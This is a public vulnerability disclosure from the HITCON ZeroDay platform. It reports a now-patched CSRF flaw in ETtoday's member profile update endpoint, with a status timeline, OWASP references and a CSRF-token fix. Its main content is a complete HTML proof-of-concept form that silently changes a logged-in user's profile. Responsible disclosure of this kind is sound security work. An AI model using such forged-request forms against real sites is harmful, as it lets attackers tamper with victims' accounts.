Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00519
- 發信 Vendor: ETtoday新聞雲
- Title: ETtoday新聞雲 修改會員資料 CSRF
- Introduction: 修改會員資料 CSRF
處理狀態
目前狀態
公開
Last Update : 2025/08/02
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2025/06/04 21:41:41 : 新提交 (由 yusheng 更新此狀態)
- 2025/06/08 17:04:04 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 16:16:12 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 16:16:12 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/12 16:16:12 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/07/28 13:51:20 : 複測申請中 (由 組織帳號 更新此狀態)
- 2025/07/28 14:14:21 : 確認已修補 (由 yusheng 更新此狀態)
- 2025/08/02 03:00:42 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00519
- 通報者:cat1528985 (yusheng)
- 風險:中
- 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)
參考資料
攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://member.ettoday.net/index.php7
敘述
重現漏洞方式
- 免費註冊 EToday 新聞雲 https://member.ettoday.net/login.php7
- 攻擊者可構造修改會員資料的 HTML 表單,引誘使用者在登入狀態點擊送出表單
<!DOCTYPE html>
<html lang="zh-TW">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>EToday 會員資料表單</title>
</head>
<body>
<form action="https://member.ettoday.net/api2/member.php7?method=profile_change" method="POST">
<div>
<label for="file">大頭照:</label>
<input type="file" id="file" name="file">
</div>
<div>
<label for="name">姓名:</label>
<input type="text" id="name" name="name" value="">
</div>
<div>
<label for="nickname">暱稱:</label>
<input type="text" id="nickname" name="nickname" value="">
</div>
<div>
<label for="fake-year">年份:</label>
<input type="hidden" id="fake-year" name="fake-year" value="1900">
</div>
<div>
<label for="fake-mon">月份:</label>
<input type="hidden" id="fake-mon" name="fake-mon" value="01">
</div>
<div>
<label for="fake-day">日期:</label>
<input type="hidden" id="fake-day" name="fake-day" value="01">
</div>
<div>
<label for="sex">性別:</label>
<select id="sex" name="sex">
<option value="m" selected>男</option>
<option value="f">女</option>
</select>
</div>
<div>
<label for="email">Email:</label>
<input type="email" id="email" name="email" value="">
</div>
<div>
<label for="address_region">地區:</label>
<input type="hidden" id="address_region" name="address[region]" value="1">
</div>
<div>
<label for="address_county">縣市:</label>
<input type="hidden" id="address_county" name="address[county]" value="">
</div>
<div>
<label for="address_district">區域:</label>
<input type="hidden" id="address_district" name="address[district]" value="">
</div>
<div>
<label for="address_zipcode">郵遞區號:</label>
<input type="hidden" id="address_zipcode" name="address[zipcode]" value="">
</div>
<div>
<label for="address_addr">地址:</label>
<input type="hidden" id="address_addr" name="address[addr]" value="">
</div>
<input type="hidden" name="json" value="0">
<input type="hidden" name="next" value="">
<div>
<input type="submit" value="提交">
</div></form>
</body>
</html>
POC 影片:https://drive.google.com/file/d/1GqVnutKj89eMRiTu1I6c9utYdD5cbOGT/view?usp=sharing
修補建議
CSRF Token
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。